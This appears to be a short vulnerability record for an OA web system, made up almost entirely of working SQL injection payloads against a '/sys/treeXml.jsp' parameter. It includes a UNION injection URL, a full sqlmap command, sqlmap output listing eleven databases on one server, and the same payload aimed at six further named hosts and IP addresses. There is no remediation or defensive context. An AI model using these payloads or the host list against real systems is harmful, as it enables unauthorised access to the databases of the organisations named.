(1)http://oa.hzuf.com:9090
UNION injection:
http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
sqlmap injection:
$ python sqlmap.py -u 'http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1&type=sort' -p Si06 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=14 --dbs --threads 10 --batch -v 1
---
Place: GET
Parameter: Si06
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns (custom)
Payload: Si06=1' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(103)+CHAR(106)+CHAR(97)+CHAR(113)+CHAR(98)+CHAR(89)+CHAR(114)+CHAR(104)+CHAR(111)+CHAR(110)+CHAR(87)+CHAR(103)+CHAR(73)+CHAR(122)+CHAR(113)+CHAR(102)+CHAR(111)+CHAR(117)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &type=sort
---
[00:46:07] [INFO] testing Microsoft SQL Server
[00:46:07] [INFO] confirming Microsoft SQL Server
[00:46:07] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Servlet 2.4, Tomcat 4.0.4., JSP
back-end DBMS: Microsoft SQL Server 2005
[00:46:07] [INFO] fetching database names
available databases [11]:
[*] FE_APP5
[*] FE_BASE5
[*] FE_ERP
[*] master
[*] model
[*] msdb
[*] ncdb
[*] oa
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
(2)http://fsd2014.f3322.org:9090
http://fsd2014.f3322.org:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(3)http://119.145.194.122:9090
http://119.145.194.122:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(4)http://oa.chnjcdc.com:9090
http://oa.chnjcdc.com:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(5)http://183.129.249.246:9090
http://183.129.249.246:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(6)http://218.205.208.22:9090
http://218.205.208.22:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort
(7)http://120.196.116.3:7321
http://120.196.116.3:7321/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort